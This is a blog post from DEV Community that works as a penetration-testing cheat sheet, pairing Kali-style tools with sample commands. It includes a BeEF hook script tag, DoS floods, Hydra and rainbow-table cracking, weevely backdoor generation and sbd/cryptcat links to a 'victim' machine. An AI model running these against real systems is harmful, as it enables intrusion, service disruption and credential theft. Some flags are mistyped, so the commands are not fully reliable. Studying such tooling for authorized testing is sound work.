DEV Community

Alpha Olomi
Alpha Olomi

Posted on

Tools for Penetration Testing

Over a course of time learning, i compiled a list of different tools used penetration testing and ethical hacking.

Database Tools Usage

  1. sqlmap

automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers

sqlmap –u victim_url
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3
Enter fullscreen mode Exit fullscreen mode

CMS Scanning Tools

  1. WPScan
wpscan --version
wpscan –u URL of webpage”.
Enter fullscreen mode Exit fullscreen mode
  1. Joomscan
joomscan –h
joomscan –-version
joomscan /?
joomscan –u victim_url
Enter fullscreen mode Exit fullscreen mode

SSL Scanning Tools

  1. TLSSLed
tlssled URL port
Enter fullscreen mode Exit fullscreen mode
  1. w3af

www audi framework

  • start
w3af
Enter fullscreen mode Exit fullscreen mode
  • enter the URL of victim
  • start

Exploitation Tools

  1. Metasploit
msfupdate
msf > search name:Microsoft type:exploit.
Enter fullscreen mode Exit fullscreen mode
  1. Armitage

MetaGUI

  1. BeEF
beef-xss
Enter fullscreen mode Exit fullscreen mode

username and password: beef.

<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
Enter fullscreen mode Exit fullscreen mode
  1. Linux Exploit Suggester

root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

  1. p0f identify the operating system of a target host simply by examining captured packets

In the hands of advanced users, P0f can detect firewall
presence, NAT use, and existence of load balancers.

p0f –-version
p0f -h

p0f –i eth0 –p -o filename
Enter fullscreen mode Exit fullscreen mode
  • open 192.168.1.2
  1. pdf-parser

parses a PDF document to identify the fundamental elements used
in the analyzed pdf

pdf-parser -o 10 filepath
Enter fullscreen mode Exit fullscreen mode
  1. dumpzilla

extract all forensic

interesting information of Firefox, Iceweasel, and Seamonkey browsers

  1. ddrescue

copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to
rescue the good parts first in case of read errors.

dd_rescue infilepath outfilepath

dd_rescue -v /dev/sdb ~/sec.img
Enter fullscreen mode Exit fullscreen mode
  1. DFF

dff-gui

Social Engineering

  1. Social Engineering Toolkit
sudo apt install sendmail
vim config/set_config
# SENDMAIL=OFF flag to SENDMAIL=ON.
Enter fullscreen mode Exit fullscreen mode

Stressing Tools

DoS attacks or to create the stress test for different
applications so as take appropriate measures for the future.

  1. Slowhttptest
slowhttptest --version
slowhttptest -h


# sampel
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u http://192.168.1.202/index.php -x 24 -p 2
Enter fullscreen mode Exit fullscreen mode

Where,
(-c 500) = 500 connections
(-H) = Slowloris mode
-g = Generate statistics
-o outputfile = Output file name
-i 10 = Use 10 seconds to wait for data
-r 200 = 200 connections with -t GET = GET requests
-u http://192.168.1.202/index.php = target URL-x 24 = maximum of length of 24 bytes
-p 2 = 2-second timeout

  1. Inviteflood

SIP/SDP INVITE message flooding over UDP/IP.

inviteflood --version

# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets

# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1
Enter fullscreen mode Exit fullscreen mode

Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a is alias of SIP account

  1. Iaxflood

VoIP DoS tool

iaxflood –-version
iaxflood –h

iaxflood sourcename destinationname numpackets
iaxflood ip_src ip_dest packets

Enter fullscreen mode Exit fullscreen mode
  1. thc-ssl-dos

verify the performance of SSL
Establishing a secure SSL connection requires 15x more processing power on the server than on the client.

# format
thc-ssl-dos victimIP httpsport –accept
# examp
thc-ssl-dos 192.168.1.1 443 –accept
Enter fullscreen mode Exit fullscreen mode

Sniffing & Spoofing

  1. Burpsuite

sniffing tool between your browser and the webservers to find
the parameters that the web application uses

  1. mitmproxy

SSL-capable man-in-the-middle HTTP proxy.

mitmproxy –-version
mitmproxy –h
mitmproxy –p portnumber
mitmproxy –p 80
Enter fullscreen mode Exit fullscreen mode
  1. Wireshark

  2. sslstrip

MITM attack that forces a victim's browser to communicate in plain-text over HTTP

sslstrip --version
sslstrip -h
sslstrip -p 80
Enter fullscreen mode Exit fullscreen mode

Password Cracking Tools

  1. Hydra

login cracker that supports many protocols to attack

hydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V
Enter fullscreen mode Exit fullscreen mode
  1. Johnny

GUI for the John the Ripper password cracking tool

  1. John

CLI for Johnny GUI.

unshadow passwd shadow > unshadowed.txt
Enter fullscreen mode Exit fullscreen mode
  1. Rainbowcrack cracks hashes by rainbow table lookup.
rcrack -h

rcrack path_to_rainbow_tables -f path_to_password_hash
rcrack path_to_rainbow_tables -f path_to_password_hash
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
./rcrack . -l hash.txt
Enter fullscreen mode Exit fullscreen mode
  1. SQLdict

dictionary attack tool for SQL server

sqldict
Enter fullscreen mode Exit fullscreen mode
  • Under “Target IP Server”,
  • Under “Target Account”, enter the username.
  • load the file with the password
  • start
  1. hash-identifier

identify types of hashes

hash-identifier 5d41402abc4b2a76b9719d911017c592
Enter fullscreen mode Exit fullscreen mode

Maintaining Access

uses to maintain connection and for access to
a hacked machine even when it connects and disconnects again.

  1. Powersploit

help to connect with the victim’s machine via PowerShell.

cd /usr/share/powersploit/
Enter fullscreen mode Exit fullscreen mode
  1. Sbd

similar to Netcat
features AES-CBC-128 + HMAC-SHA1 encryption

# server
sbd -l -p 44

# visctim
sbd 192.168.43.2 44
Enter fullscreen mode Exit fullscreen mode
  1. Weevely

PHP web shell that simulate telnet-like connection
used as a stealth backdoor

# check
weevely -h

# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php

# formart
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123
Enter fullscreen mode Exit fullscreen mode
  1. http-tunnel

creates a bidirectional virtual data stream tunneled in HTTP requests
This can be useful for users behind restrictive firewalls.

# server
httptunnel_server –h

# client
httptunnel_client –h
Enter fullscreen mode Exit fullscreen mode
  1. cryptcat

similar to Netcat which allows to make TCP and UDP connection with a victim’s
machine in an encrypted way

# server
cryptcat –l –p port –n

# client
cryptcat IPofServer PortofServer
Enter fullscreen mode Exit fullscreen mode

Reverse Engineering

  1. OllyDbg

32-bit assembler level analyzing debugger for MS Windows applications
used to crack the commercial softwares.

  • start
ollydbg
Enter fullscreen mode Exit fullscreen mode
  1. dex2jar

convert APK file (android) to JAR file in order to view the source code.

d2j-dex2jar –d /file location
d2j-dex2jar –d ~/Desktop/class.dex
Enter fullscreen mode Exit fullscreen mode
  1. jd-gui

standalone graphical utility that displays Java source codes of “.class” files.

jd-gui
Enter fullscreen mode Exit fullscreen mode
  1. apktool

best tools to reverse the whole android application

apktool
# decompile
apktool d apk file
Enter fullscreen mode Exit fullscreen mode

Reporting Tools

  1. Dradis
service dradis start
dradis
Enter fullscreen mode Exit fullscreen mode
  1. Metagoofil

search in Google to identify and download the documents to the local
disk and then extracts the metadata

# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res
Enter fullscreen mode Exit fullscreen mode
  • –d (domain name)
  • –t (filetype to download dox,pdf,etc)
  • –l (limit the results 10, 100 )–n (limit files to download)
  • –o ( location to save the files)
  • –f (output file)

Misc

  1. strace
# sample
strace –e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp
Enter fullscreen mode Exit fullscreen mode

Top comments (1)

Some comments may only be visible to logged-in visitors. Sign in to view all comments.